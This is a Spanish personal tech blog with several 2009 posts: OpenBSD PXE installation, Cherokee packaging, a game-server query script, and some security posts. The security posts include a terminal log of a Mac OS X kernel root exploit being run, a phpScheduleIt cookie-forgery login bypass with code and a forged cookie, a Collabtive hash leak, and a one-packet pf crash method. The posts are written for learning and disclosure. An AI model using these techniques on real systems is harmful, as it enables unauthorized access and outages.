nonr00t stuff (uid != 0)

Installing OpenBSD on Eee PC 1000H

2009-06-22T20:10:00.011-05:00

Fig 1. ASUS EEE PC 1000H

Hoy quise instalar OpenBSD 4.5 en el Asus para verificar que el reconocimiento de las interfaces de red si se habia hecho en esta versión. Aquí está un recuento rápido del procedimiento:

1. ¿Donde instalarlo?

Lo primero era pensar en donde instalar el sistema operativo?, si usaba una partición, o usaba todo el disco duro o ...
recordé que tenia una micro SD de 2GB disponibles, entonces decidí montarlo allí.

Fig 2. micro/mini SD de 2GB (1826MB exactly)

2. ¿Cómo lo instalo?

Recordé que mi ASUS no tiene unidad de CDROM entonces solo quedaba la alternativa de instalarlo por disco o por red, entonces mejor opte por instalarlo por red. Para esto necesitaba un servidor DHCP y un servidor TFTP corriendo en algún lado. Mi maquina Desktop es un iMAC, cual podría ser el problema al tratar de instalar estos servicios ahí?, go ahead!

3. Instalando el servicio DHCP en el iMAC

Como ya todos saben, el iMAC tiene un sistema operativo llamado Leopard (por debajo Darwin) que no es un Linux ni un BSD, es una mezcla de BSD y mach.

#uname -a
Darwin Kernel Version 9.5.0: Wed Sep 3 11:29:43 PDT 2008; root:xnu-1228.7.58~1/RELEASE_I386 i386

Estos iMAC son x86 así que no hay problema por la compatibilidad de paquetes o cosas así.

Lo que hice fue descargar el tarball del dhcp del sitio oficial ISC:

ftp://ftp.isc.org/isc/dhcp/dhcp-4.1.0.tar.gz

Desde estas fuentes compilé el software:

bash-3.2# pwd
/Users/nonroot/dhcp-4.1.0
bash-3.2# ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for gawk... no
checking for mawk... no
checking for nawk... no
checking for awk... awk
checking whether make sets $(MAKE)... yes
checking for gcc... gcc
...

bash-3.2# make
Making all in includes
make all-am
make[2]: Nothing to be done for `all-am'.
Making all in tests
make[1]: Nothing to be done for `all'.
...

Una vez compilado y como es algo temporal no lo voy a instalar en el sistema, sino que lo voy a usar del directorio compilado:

bash-3.2# pwd
/Users/nonroot/dhcp-4.1.0/server
bash-3.2# ./dhcpd
Internet Systems Consortium DHCP Server 4.1.0
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Can't open /etc/dhcpd.conf: No such file or directory
...

Me sale un error relacionado con el archivo de configuración, entonces le digo a mi madre que por favor me dicte las líneas del archivo de configuración que no me acuerdo (fake):

option domain-name-servers 192.168.0.100; ddns-update-style ad-hoc; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.150 192.168.0.200; filename "pxeboot"; next-server 192.168.0.4; default-lease-time 300000; max-lease-time 350000; option routers 192.168.0.100; }
Estas líneas las almaceno en el archivo /etc/dhcpd.conf, en este punto es importante recordar que la variable next-server debe apuntar a la maquina donde estoy instalando el servidor dhcp y que tendrá tambien el servidor tftp.

Una vez creado el archivo puedo ejecutar el binario:

bash-3.2# pwd
/Users/nonroot/dhcp-4.1.0/server
bash-3.2# ./dhcpd

Al parecer saca un error, pero comprobamos que este corriendo:

bash-3.2# ps aux | grep -i dhcpd
root 8475 0.0 0.1 77832 768 ?? Ss 5:59PM 0:00.02 ./dhcpd
...

4. Instalando el servicio TFTP en el iMAC

Uhmm como hacemos?, toca buscar un poco en Internet y me encuentro lo siguiente:

http://www.macosxhints.com/article.php?story=20070218233806794

Allí explican muy bien, dicen que Leopard no usa el famoso inetd sino un demonio llamado launchd, este demonio carga configuraciones en xml que se encuentran en la ruta de servicios del S.O.:

bash-3.2# ls /System/Library/LaunchDaemons/ | more
bootps.plist
com.apple.AOSHelper.plist
com.apple.ATSServer.plist
com.apple.AppleFileServer.plist
com.apple.CoreRAID.plist
com.apple.DirectoryServices.plist
com.apple.DirectoryServicesLocal.plist
...

Entonces seguimos los pasos que allí nos indican:

Subimos el servicio:

bash-3.2# launchctl load -w /System/Library/LaunchDaemons/tftp.plist

Bajamos el servicio:

bash-3.2# launchctl unload -w /System/Library/LaunchDaemons/tftp.plist

El directorio raiz para el TFTP esta en:

bash-3.2# pwd
/private/tftpboot
bash-3.2#

Donde obviamente al principio no hay nada, entonces debemos entrar al ftp de OpenBSD y descargar 2 archivos:

ftp://ftp.openbsd.org.ar/pub/OpenBSD/4.5/i386/pxeboot
ftp://ftp.openbsd.org.ar/pub/OpenBSD/4.5/i386/bsd.rd

Estos dos archivos son suficientes para arrancar el sistema de instalación.
Una vez descargados los dos archivos los copio al directorio /private/tftpboot y como el archivo pxeboot buscará un archivo llamado bsd, entonces renombro el archivo bsd.rd a bsd.

bash-3.2# pwd /private/tftpboot bash-3.2# mv bsd.rd bsd

Listo, cargo nuevamente el servicio tftp y ahora configuro el ASUS para que arranque por red.

5. Arranque por red del ASUS

Entro con la opción F2 a la BIOS del sistema y busco la sección Boot, una vez allí habilito la opción "OnBoard LAN Boot ROM" y en la prioridad de boot dejo como primera opción:
"Network:Atheros Boot Agent". Aún queda faltando una cosa, debemos grabar los cambios y entrar con Shift+F10, una vez en la pantalla de boot de Atheros, debemos configurar dos campos:

Network Boot Protocol = PXE
Boot Order = Int 19H (que significa que primero intente el arranque por red y luego por el disco)

Una vez realizado estos cambios podemos reiniciar el sistema y esperar a que cargue el asistente de instalación de OpenBSD.

Fig 3. Arranque por PXE desde el ASUS

6. Instalación de OpenBSD 4.5

Seguimos el proceso tradicional de instalación de OpenBSD y cuando nos pregunte por el disco raiz en donde se va a instalar el sistema, seleccionamos sd0, OpenBSD reconoce la microSD como dispositivo sd0. Cuidado con seleccionar el wd0 porque puede borrar el disco duro (Ojo, esto es en mi 1000H, verifique su versión de asus porque algunas versiones de ASUS usan discos SD que OBSD los puede reconocer con los mismos nombres).

Cuando llegamos al punto donde nos piden los paquetes podemos hacerlo desde un mirror local o usar alguno de los sugeridos (esta fue mi opción) de esta forma el instalador se conecta a un servidor http remoto y descarga todos los .tgz necesarios para instalar el sistema (opción muuuyyy lenta).

Durante la creación de dispositivos finalizando la instalación, el sistema tomo mas tiempo del normal, pero finalmente se instaló, por favor sea paciente, estamos instalando en una microSD de mala calidad :p.

La parte simpatica del asunto es que efectivamente se nos reconocieron los dos dispositivos de red con los drivers ale y ral (así llamaré a mis dos primeros hijos), por lo tanto debemos tener dos dispositivos llamados:

ale0 y ral0

# ifconfig
lo0: flags=8049 mtu 33204
priority: 0
groups: lo
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
inet 127.0.0.1 netmask 0xff000000

ale0: flags=8843 mtu 1500
lladdr 00:22:15:6d:59:73
priority: 0
groups: egress
media: Ethernet 1000baseT full-duplex (100baseTX full-duplex)
status: active
inet6 fe80::222:15ff:fe6d:5973%ale0 prefixlen 64 scopeid 0x1
inet 192.168.0.150 netmask 0xffffff00 broadcast 192.168.0.255

ral0: flags=8843 mtu 1500
lladdr 00:15:af:bc:fc:4d
priority: 0
groups: wlan
media: IEEE802.11 autoselect (DS2 mode 11g)
status: active
ieee80211: nwid hack chan 11 bssid 00:0f:66:0c:7b:9d 13dB wpapsk 0xd93fc0f93a9ca36ef3cd4e5e1c51700ee80c97331f42de28bd42beadc41ed4f4 wpaprotos wpa1,wpa2 wpaakms psk wpaciphers tkip,ccmp wpagroupcipher tkip
inet6 fe80::215:afff:febc:fc4d%ral0 prefixlen 64 scopeid 0x2
inet 192.168.0.151 netmask 0xffffff00 broadcast 192.168.0.255

Para configurar la tarjeta ale0 se hace del modo tradicional (ifconfig), para configurar la ral0 y conectarme a la red inalambrica, lo que hago es pasar al siguiente paso.

7. Configuración de la tarjeta inalambrica del ASUS con OpenBSD 4.5

Cuando el AP no tiene seguridad de ningún tipo, solo basta con hacer:

#ifconfig ral0 nwid hack

donde "hack" es el ESSID de la red inalambrica.

Cuando el AP tiene seguridad es necesario configurar algo más:

Si la seguridad es WPA/WPA2 PERSONAL/ENTERPRISE TKIP

# ifconfig ral0 nwid hack wpa wpapsk `wpa-psk hack hacking123`
# dhclient ral0
DHCPREQUEST on ral0 to 255.255.255.255 port 67
DHCPACK from 192.168.0.4
bound to 192.168.0.151 -- renewal in 150000 seconds.
#

Para este caso el ESSID es: "hack" y la palabra de paso (la clave) es: "hacking123"
Lo que hicimos es meter dentro del mismo comando el cifrado que genera el comando wpa-psk.
Tambien lo podemos sacar por aparte y luego "pegarlo" en la línea de comando:

# wpa-psk hack hacking123
0x3cb27ebe4a27cf8e81bb4f81c8a72828bde42d7ba1738227494d67f3fad17b00
#

# ifconfig ral0 nwid hack wpa wpapsk \ 0x3cb27ebe4a27cf8e81bb4f81c8a72828bde42d7ba1738227494d67f3fad17b00

Funciona exactamente igual, para mas información leer el manual de wpa-psk.

Verifique que usa TKIP, si usa AES no funcionará., las pruebas las hice con PERSONAL y ENTERPRISE configurando un servidor radius aparte.

Si quieren dejar la configuración de forma permanente en el sistema, deben editar el archivo /etc/hostname.ral0

# cat /etc/hostname.ral0
dhcp NONE NONE NONE nwid hack wpa wpapsk `wpa-psk hack hacking123`
#

De esta forma cada vez que arranque el sistema pedirá una IP por dhcp.

Nota: Cada vez que quieras arrancar el asus por el SD, debes decirle en la BIOS que haga boot por el dispositivo USB, de lo contrario te dará problemas para arracar OpenBSD.

Esto es todo amigos, recuerden asistir a las charlas programadas sobre OpenBSD en la Campus ;)

2009-05-18T20:31:00.002-05:00

Aveces quiero entrar a jugar a UT Colombia, pero no se si estará lleno el servidor o si estarán conectados ciertos jugadores y bueno, conectarse y desconectarse toma un tiempo. Entonces empece a leer sobre el protocolo que usa el servidor de juegos y como resultdo saque este mini script para saber si hay cupo o nó?, te animas a hacerlo mas completo?

bash-3.2# cat ut2.py
#!/usr/bin/python
#
#codeb by nonroot -- domain public license ---
#May 2009
"""
La consulta al servidor devuelve algo asi:
La respuesta es '['\xff\xff\xff\xffinfoResponse\n', 'game', 'q3ut4', 'maxPing', '180', 'pure', '1', 'gametype', '7', 'sv_maxclients', '16', 'clients', '16', 'mapname',
'ut4_harbortown', 'hostname', 'Ubuntu-Colombia CTF Server', 'protocol', '68']'
Para estudiar mas acerca del protocolo de red quake 3 68, puedes leer:
http://www.tilion.org.uk/Games/Quake_3/Network_Protocol
y puedes hacer lo que se te ocurra con el server :p
"""
from sys import argv, exit
from socket import *
import re, string

#servidor de UT
servidor="200.85.231.152"

#puerto del servidor
puerto=27960

#creo el socket UDP
sock = socket(AF_INET, SOCK_DGRAM)

#envio la peticion
sock.sendto('\xFF\xFF\xFF\xFFgetinfo',(servidor,puerto))

#recibo la respuesta
resp, server = sock.recvfrom(1024)

#separo los campos segun el formato que devuelve el servidor
datos=re.split(r"[\\]+",resp)

texto=">>>\n"
texto+="El servidor Ubuntu Colombia soporta: "+datos[10]+ " usuarios.\n"
texto+="Hay "+ str(int(datos[10])-int(datos[12]))+ " cupos disponibles para jugar.\n"
texto+="El mapa actual es: "+datos[14]+".\n"
texto+=">>>\n"

print texto

#cierro el socket de conexion UDP
sock.close()
bash-3.2#

¿Como se usa?

bash-3.2# python ut2.py
>>>
El servidor Ubuntu Colombia soporta: 16 usuarios.
Hay 1 cupos disponibles para jugar.
El mapa actual es: ut4_mandolin.
>>>

bash-3.2#

Espero que les sirva para algo ;)

MacOSX too!

2009-05-17T23:42:00.001-05:00

imac-de-fernando-quintero:~ fernandoquintero$ nano exp.c
imac-de-fernando-quintero:~ fernandoquintero$ gcc -o exp exp.c
imac-de-fernando-quintero:~ fernandoquintero$ mv exp xnu-hfs-fcntl-v2
imac-de-fernando-quintero:~ fernandoquintero$ nano exp.sh
imac-de-fernando-quintero:~ fernandoquintero$ sh exp.sh
-en Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@

-n * creating diskimage...
done
-n * attaching/mounting diskimage...
done
-e * executing exploit...

Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@$!

* getattrlist...done
** attrlist length: 36
** fndrinfo:
* done

* setattrlist...done
* overwriting @0x0050770C
* done

* setattrlist...done
* overwriting @0x00507998
** sysent[21].sy_call: 0x0050770C
* done

* jumping...done

* getuid(): 0
+Wh00t

bash-3.2# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),102(com.apple.sharepoint.group.2),101(com.apple.sharepoint.group.1),4(tty),103(com.apple.sharepoint.group.3),5(operator),80(admin),20(staff)
bash-3.2#

Y para salir?, un exploit decente:

bash-3.2# touch file
bash-3.2# ls -la file
-rw-r--r-- 1 root staff 0 May 17 23:43 file
bash-3.2# exit
exit
-n * detaching/unmounting diskimage...
done
imac-de-fernando-quintero:~ fernandoquintero$

LOL

Moving a library at home

2009-05-17T15:58:00.008-05:00

Todos sabemos lo difícil que es realizar una migración, siempre nos vamos a encontrar con problemas de compatibilidad de versiones, de sistemas operativos, de usuarios, de tiempo, dinero, etc, etc, etc. Pero una vez realizada la migración podemos sentirnos bien, pues las cosas deberían funcionar mejor de ahí en adelante (todo con un adecuado soporte).

Esta entrada en el blog la hago para felicitar a mi familia por la migración que hemos realizado durante los últimos (010) días, hemos peleado con el polvo, la suciedad, los libros, la madera, el cableado y etc. Con paciencia todo se logra ;)

¿Que pensaron?, ¿que sería un post técnico?

Fig 1. Versión 1.0 de la biblioteca (Beta)

Fig 2. Versión 2.0 de la biblioteca (Stable) - está en el SVN

National Survey of Digital Literacy

2009-05-16T16:52:00.000-05:00

Hace unos días se viene solicitando por diferentes medios que contribuyamos respondiendo a una encuesta de carácter nacional relacionada con el tema de alfabetización tecnológica. Pues bueno, por fin saqué los 5 minutos y la llené, me pareció interesante el formato de la encuesta y la rapidez en su desarrollo. Los invito a que entren a este sitio: http://encuesta.e-ciudadano.org y participen.

Aquí están mis resultados, los que me tranquilizan porque al menos en Colombia parezco no ser un analfabeta tecnológico ;).

Fig 1. Resultados de la encuesta

Cherokee 0.99.15 on OpenBSD 4.5

2009-05-15T22:53:00.001-05:00

Cherokee es considerado por muchos el servidor web mas rápido que existe, aún no esta en su versión estable, pero ya se comporta como si lo estuviera. Hace un tiempo trabajé en el port para tener cherokee en OpenBSD, el día de hoy he estado compilando y aplicando unos parches para que la última release, la versión 0.99.15 pueda correr sin problemas en OpenBSD.

A continuación describo el procedimiento para todos aquellos que quieran experimentar esta excelente aplicación en este excelente sistema operativo :)

1. Instale cherokee en su OpenBSD sin necesidad de compilar los ports de la versión "current", para esto use el siguiente paquete binario:

http://www.openbsdcolombia.org/pyp/paquetes/4.5/www/cherokee-0.99.15.tgz

de la siguiente forma:

# uname -a
OpenBSD astrid.nonroot.org 4.5 GENERIC#1749 i386
# pkg_add -v http://www.openbsdcolombia.org/pyp/paquetes/4.5/www/cherokee-0.99.15.tgz
parsing http://www.openbsdcolombia.org/pyp/paquetes/4.5/www/cherokee-0.99.15.tgz
Dependencies for cherokee-0.99.15 resolve to: pcre-7.8, spawn-fcgi-1.6.2 (todo: pcre-7.8,spawn-fcgi-1.6.2)
cherokee-0.99.15:parsing pcre-7.8
found libspec c.50.1 in /usr/lib
cherokee-0.99.15:pcre-7.8: complete
cherokee-0.99.15:parsing spawn-fcgi-1.6.2
found libspec c.50.1 in /usr/lib
cherokee-0.99.15:spawn-fcgi-1.6.2: complete
found libspec c.50.1 in /usr/lib
found libspec crypto.17.0 in /usr/lib
found libspec pcre.2.2 in package pcre-7.8
found libspec pthread.11.1 in /usr/lib
found libspec ssl.14.0 in /usr/lib
adding group _cherokee
adding user _cherokee
installed /etc/cherokee/cherokee.conf from /usr/local/share/examples/cherokee/etc/cherokee.conf****************************************************************************** | 99%
installed /var/cherokee/images/cherokee-logo.png from /usr/local/share/examples/cherokee/www/images/cherokee-logo.png*********************************************************| 100%
installed /var/cherokee/images/default-bg.png from /usr/local/share/examples/cherokee/www/images/default-bg.png
installed /var/cherokee/images/powered_by_cherokee.png from /usr/local/share/examples/cherokee/www/images/powered_by_cherokee.png
installed /var/cherokee/index.html from /usr/local/share/examples/cherokee/www/index.html
installed /var/log/cherokee/cherokee.access from /usr/local/share/examples/cherokee/www/index.html
installed /var/log/cherokee/cherokee.error from /usr/local/share/examples/cherokee/www/index.html
cherokee-0.99.15: complete
--- cherokee-0.99.15 -------------------
To complete the installation, you need to configure cherokee. As root:
# cherokee-admin -b [IP]
(where IP is a trusted IP used to configure your web server)

If you want to run cherokee on boot, add these lines to /etc/rc.local:

if [ X"${cherokee_flags}" != X"NO" ]; then
echo -n ' cherokee'
/usr/local/sbin/cherokee-guardian ${cherokee_flags} 1> /dev/null
fi

for admin management:

if [ X"${cherokee-admin_flags}" != X"NO" ]; then
echo -n ' cherokee-admin'
/usr/local/sbin/cherokee-admin ${cherokee-admin_flags} 1> /dev/null &
fi

and in /etc/rc.conf.local :

cherokee_flags="-d" # use -d to run in daemon mode
cherokee-admin_flags=NO # use -b if you want listen on ALL interfaces
#

Como puede ver solo ejecutamos un comando y ya tenemos instalado cherokee en nuestra maquina (todas las dependencias son descargadas desde el mismo sitio, asi que no hay problema).

2. Al finalizar la instalación sale un mensaje informativo, donde nos explican que si queremos hacer que cherokee se inicie en cada arranque de sistema debemos agregar unas líneas a los archivos de arranque, si no lo queremos hacer, podemos obviar este paso.

Al final del archivo /etc/rc.local agregamos las siguientes líneas:

if [ X"${cherokee_flags}" != X"NO" ]; then
echo -n ' cherokee'
/usr/local/sbin/cherokee-worker ${cherokee_flags} 1> /dev/null
fi

if [ X"${cherokee-admin_flags}" != X"NO" ]; then
echo -n ' cherokee-admin'
/usr/local/sbin/cherokee-admin ${cherokee-admin_flags} 1> /dev/null &
fi

Esto logra que el sistema de arranque evalue la posibilidad de arrancar el servidor web cherokee o su interfaz de configuración, validando las variables cherokee_flags y cherokee-admin_flags.

El siguiente paso es agregar al archivo /etc/rc.conf.local las variables que determinan el arranque.

cherokee_flags="-d" # use -d to run in daemon mode
cherokee-admin_flags=NO # use -b if you want listen on ALL interfaces

Si las dejas así como estan, cherokee iniciará, pero no cargará su interfaz de configuración, esta es la opción RECOMENDADA.

NOTA: Se dió cuenta del cambio de la palabra guardian por worker?, esto es porque en el paquete de instalación aún no he corregido algunas cosas, entonces tenga en cuenta que para subir cherokee no debe usar el comando cherokee-guardian sino cherokee-worker.

3. Ahora solo nos queda probar entrando a la IP de la maquina que tiene el servicio instalado.

Fig 1. Página de bienvenida de cherokee

Bien, ahora teniendo cherokee instalado seguro va a querer probar la interfaz de configuración, para esto es necesario instalar otro paquete adicional, puesto que toda la interfaz esta programada en python. Si ya tienes python en tu sistema, no será necesario este paso.

# pkg_add -v ftp://ftp.openbsd.org/pub/OpenBSD/4.5/packages/i386/python-2.5.4.tgz
parsing ftp://ftp.openbsd.org/pub/OpenBSD/4.5/packages/i386/python-2.5.4.tgz
Dependencies for python-2.5.4 resolve to: sqlite3-3.6.10, bzip2-1.0.5 (todo: bzip2-1.0.5,sqlite3-3.6.10)
python-2.5.4:parsing bzip2-1.0.5
found libspec c.50.1 in /usr/lib
python-2.5.4:bzip2-1.0.5: complete
python-2.5.4:parsing sqlite3-3.6.10
found libspec c.50.1 in /usr/lib
found libspec ncurses.10.0 in /usr/lib
found libspec pthread.11.1 in /usr/lib
found libspec readline.3.0 in /usr/lib
python-2.5.4:sqlite3-3.6.10: complete
found libspec bz2.10.4 in package bzip2-1.0.5
found libspec c.50.1 in /usr/lib
found libspec crypto.17.0 in /usr/lib
found libspec expat.9.0 in /usr/lib
found libspec m.5.0 in /usr/lib
found libspec ncurses.10.0 in /usr/lib
found libspec ossaudio.3.1 in /usr/lib
found libspec panel.3.0 in /usr/lib
found libspec pthread.11.1 in /usr/lib
found libspec readline.3.0 in /usr/lib
found libspec sqlite3.13.0 in package sqlite3-3.6.10
found libspec ssl.14.0 in /usr/lib
found libspec stdc++.47.0 in /usr/lib
found libspec util.11.0 in /usr/lib
found libspec z.4.1 in /usr/lib
python-2.5.4: complete
--- python-2.5.4 -------------------
If you want to use this package as your default system python, as root
create symbolic links like so (overwriting any previous default):
ln -sf /usr/local/bin/python2.5 /usr/local/bin/python
ln -sf /usr/local/bin/python2.5-config /usr/local/bin/python-config
ln -sf /usr/local/bin/pydoc2.5 /usr/local/bin/pydoc
# ln -sf /usr/local/bin/python2.5 /usr/local/bin/python
# ln -sf /usr/local/bin/python2.5-config /usr/local/bin/python-config
# ln -sf /usr/local/bin/pydoc2.5 /usr/local/bin/pydoc

Instalamos el paquete desde el repositorio oficial y luego creamos los enlaces simbolicos que nos sugieren. Despues de esto ya podemos habilitar la interfaz de configuración, para esto ejecutamos el siguiente comando:

# cherokee-admin -b

Login:
User: admin
One-time Password: 4X8VkNyPAjYpW7op

Web Interface:
URL: http://localhost:9090/

Cherokee Web Server 0.99.15 (May 15 2009): Listening on port ALL:9090, TLS
disabled, IPv6 disabled, using poll, 128 fds system limit, max. 57
connections, caching I/O, single thread

Vas a observar que el cherokee nos da información acerca de la contraseña que necesitaremos para ingresar al sistema, copia esta contraseña y usala cuando entres al sitio web.

Fig 2. Ingreso a la interfaz de configuración de cherokee

Puede ser que al intentar entrar en la interfaz de administración obtengas este error:

Este error se presenta cuando no tenemos python instalado en el sistema o no hemos creado adecuadamente los enlaces simbolicos que nos sugieren. Por el contrario, si todo marcha bien, veremos algo así:

Fig 3. Interfaz de configuración de cherokee

Todos los cambios realizados en la interfaz web se verán reflejados en el archivo /etc/cherokee/cherokee.conf, tambien recuerda que para agregar contenido a tu sitio web puedes usar el directorio /var/cherokee mas conocido como el "DocumentRoot".

Y bueno para terminar, si requieres usar alguno de los complementos de cherokee, por ejemplo el validador de mysql o ldap puedes instalar los paquetes adicionales, por ejemplo, para instalar el soporte de autenticación contra un servidor LDAP, puedes instalar el paquete así:

# pkg_add -v http://www.openbsdcolombia.org/pyp/paquetes/4.5/www/cherokee-ldap-0.99.15.tgz
parsing http://www.openbsdcolombia.org/pyp/paquetes/4.5/www/cherokee-ldap-0.99.15.tgz
Dependencies for cherokee-ldap-0.99.15 resolve to: openldap-client-2.3.43, cherokee-0.99.15 (todo: openldap-client-2.3.43)
cherokee-ldap-0.99.15:parsing openldap-client-2.3.43
Dependencies for openldap-client-2.3.43 resolve to: cyrus-sasl-2.1.22p4 (todo: cyrus-sasl-2.1.22p4)
cherokee-ldap-0.99.15:parsing cyrus-sasl-2.1.22p4
found libspec asn1.16.0 in /usr/lib
found libspec c.50.1 in /usr/lib
found libspec com_err.16.0 in /usr/lib
found libspec crypto.17.0 in /usr/lib
found libspec gssapi.5.0 in /usr/lib
found libspec krb5.16.0 in /usr/lib
cherokee-ldap-0.99.15:cyrus-sasl-2.1.22p4: complete
found libspec asn1.16.0 in /usr/lib
found libspec c.50.1 in /usr/lib
found libspec com_err.16.0 in /usr/lib
found libspec crypto.17.0 in /usr/lib
found libspec gssapi.5.0 in /usr/lib
found libspec krb5.16.0 in /usr/lib
found libspec sasl2.2.22 in package cyrus-sasl-2.1.22p4
found libspec ssl.14.0 in /usr/lib
installed /etc/openldap/ldap.conf from /usr/local/share/examples/openldap/ldap.conf******************************************************************** | 82%
cherokee-ldap-0.99.15:openldap-client-2.3.43: complete
found libspec asn1.16.0 in /usr/lib
found libspec com_err.16.0 in /usr/lib
found libspec crypto.17.0 in /usr/lib
found libspec gssapi.5.0 in /usr/lib
found libspec krb5.16.0 in /usr/lib
found libspec lber.9.1 in package openldap-client-2.3.43
found libspec ldap.9.1 in package openldap-client-2.3.43
found libspec sasl2.2.22 in package cyrus-sasl-2.1.22p4
found libspec ssl.14.0 in /usr/lib
cherokee-ldap-0.99.15: complete
#

Eso es todo, dudas, sugerencias en los comentarios.

Buena energia para el proyecto cherokee y larga vida a OpenBSD !

Bug and Exploit for Collabtive

2009-05-13T19:47:00.005-05:00

Existe un proyecto llamado collabtive que nos permite gestionar proyectos, el soft es bonito y tiene algunas features interesantes. Como lo estoy usando y segun la politica interna (mia) #456 que dice: "Debes auditar todo el código de los proyectos que uses ...", decidí darle un chequeo a la aplicación en el sistema de validación y encontre que todo estaba bien!, deprimido por no haber encontrado nada, decidí comerme un manimoto® y abrir un enlace al archivo API y bueno, ya conocen el resto ...

El bug fué informado, sin embargo puede que los desarrolladores no consideren importante que se puedan ver los usuarios y hashes MD5 de la BD que usa el soft.

En fin, la moraleja es que los archivos que no estan ligados directamente a la autenticación o el manejo de sesiones, deben estar igual de protegidos contra posibles entradas inesperadas.

Queda como tarea de johana explicar el error en la llamada de la API.

Saludos.

pd: AHH!, quieren ver la salida?: click here.

pd2: Por favor no usen ESTE sitio para romper el MD5, no les va a funcionar.

pd3: En guindows no funciona el bug de la misma forma, pero es posible explotarlo, porque?, porque?

Bug and Exploit

2009-04-15T00:08:00.004-05:00

Uhmmm supongamos que cuando intentamos abrir una aplicación nos pide un típico cuadro de LOGIN, PASSWORD para loguearnos.

Supongamos que el código de la validación es algo como:

// Logging user out
if (isset($_GET['logout'])) {
$auth->doLogout();
}
else if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$msg = $auth->doLogin($_POST['email'], $_POST['password'], (isset($_POST['setCookie']) ? 'y' : null), false, $resume, $_POST['language']);
}
else if (isset($_COOKIE['ID'])) {
$msg = $auth->doLogin('', '', 'y', $_COOKIE['ID'], $resume); // Check if user has cookies set up. If so, log them in automatically
}

Esto nos indicaria que si no es posible validarse de la forma normal, podemos usar una cookie, que generalmente recuerda nuestra sesión y evita que nos logueemos cada vez que abrimos una página del mismo software. En dicho caso la COOKIE se llamaria ID.

Supongamos que tenemos un código que valida la cookie:

if ($isCookie !== false) { // Cookie is set
$cookieValue = $isCookie;

if ( ($id = $this->verifyCookie($cookieValue)) !== false) {
$ok_user = $ok_pass = true;
}

En el caso hipotetico (patetico?), se validaria la cookie si existe con una función llamada verifyCookie.

Supongamos que esa función es algo como:

function verifyCookie($cookieValue)
{
$parts = explode('|', $cookieValue);
if (count($parts) != 2) {
return false;
}

$memberid = $parts[0];
if ( $cookieValue == $this->generateCookie($memberid) ) {
return $memberid;
}
else
{
return false;
}
}

Eso me diria algo como que lo que viene en la cookie (ID), debe tener dos partes y la cookie completa deberia ser igual al resultado de la función generateCookie.

Supongamos que la función generateCookie() tiene el siguiente código:

function generateCookie($memberid)
{
$passwordhash = $this->db->getPassword($memberid);
$cookiehash = md5($memberid . substr($passwordhash, 1, strlen($passwordhash) -5) );

return $memberid.'|'.$cookiehash;
}

Esto me diria que basado en el primer campo de la cookie voy a generar un MD5 de no se que y no se que, de un hash que obtuve con el usuario.

¿ PERO SE VALIDA EL USUARIO?

Supongamos que el usuario no se valida, entonces la deducción me lleva a concluir que puedo generar una cookie a mi antojo que cumpla con lo que la función quiere ver.
Que tal si la COOKIE[ID] tiene un valor como:

astrideliana|a1c6dbe433e08708f7f0e3e2c5a26fed

Supongamos que usamos una herramienta para configurar esta cookie en nuestro navegador y luego entramos al sitio inicial donde nos piden el usuario y la clave.

Supongamos que nos logueamos sin necesidad de ingresar un usuario/clave validos.

Supongamos que ese software se llama: phpScheduleIt.

Supongamos que hay un dicho en la seguridad que dice:

"Cuando un usuario tenga la posibilidad de manipular los datos que ingresan a un sistema de validación y este no haga bien su trabajo, el usuario podrá hacer lo que quiera, puesto que la seguridad depende exclusivamente del conocimiento de ese usuario."

Este dicho, obviamente no existe, pero me gusta inventar.

Recomendación: Nunca, por ningun motivo permita que un usuario manipule mas de lo debido sus datos de entrada, y sobre todo nunca, pero nunca, dejen de soñar.

Post dedicado a [SU]KARITAS ;)

Bug and Exploit for Packet Filter

2009-04-13T16:12:00.006-05:00

Hace algunos días se publico un parche para las últimas versiones de OpenBSD, relacionado con Packet Filter. El problema si bien es muy simple es algo que nos pone a reflexionar sobre el mundo de la seguridad. Realmente queria hacer un post acerca de la seguridad en todos los aspectos, pero ya me dió pereza y me dió rabia que al tratar de encontrar información sobre los bugs de OpenBSD nadie explicara como funciona, aunque mi intención solo fuera aprender.

Y así pasa muchas veces, se anuncian los parches de seguridad, se arreglan (fix) los CVS, pero nadie dice nada, quizas por no alarmar, pero y los que queremos aprender un poco mas?, donde queda la comunidad de la seguridad?, la que no es la industria de la seguridad informática, ($$$$) sino los que quieren hacer investigación y entender bugs y exploits?

Ahggr!!!

Bueno, el bug de pf consiste en un paquete que no es capaz de manipular cuando pasa por medio de reglas NAT o RDR, en el reporte de seguridad dicen que se trata del manejo de un paquete IP relacionado con ICMPV6, lo que hice entonces fue lo siguiente:

1. Tratar de encontrar mas información en la lista misc@ de OpenBSD sin mucho éxito.

2. Leer el post oficial de la persona que encontro el Bug, de ahi se concluye que el bug se reproduce cuando se usa NMAP con la opción -sO.

3. Leer el manual de NMAP para entender que hace la opción -sO, concluyendo que el chequeo que realiza es un cambio del campo de protocolo en el encabezado IP, para averiguar cuales estan disponibles en el sistema que se esta escaneando.

4. Buscar la opción mas rápida para simular lo que hace el NMAP, pero al hacer pruebas, me encuentro con que NMAP randomiza los protocolos y por lo tanto no se cuando hace el panic.

5. Pongo un sniffer del otro lado (IP destino) y analizo cual es el último paquete antes de que se caiga el sistema.

6. Lo que hago a continuación es crear un pequeño script en python usando la libreria scapy e intentar un barrido cambiando el protocolo de los paquetes IP.

7. Al encontrar el protocolo "mágico", que obviamente seria el ICMPV6, arreglo el script para que solo envíe un paquete con el encabezado modificado a 58, donde 58 es el código del protocolo.

8. PLUMP!, al suelo OpenBSD :(

9. Sigo triste por este tipo de bugs tan tontos, que pasan desapercibidos, pero que confirman la ley universal: El código esta hecho por humanos, es vulnerable!.
(esta ley universal la estoy inventando)

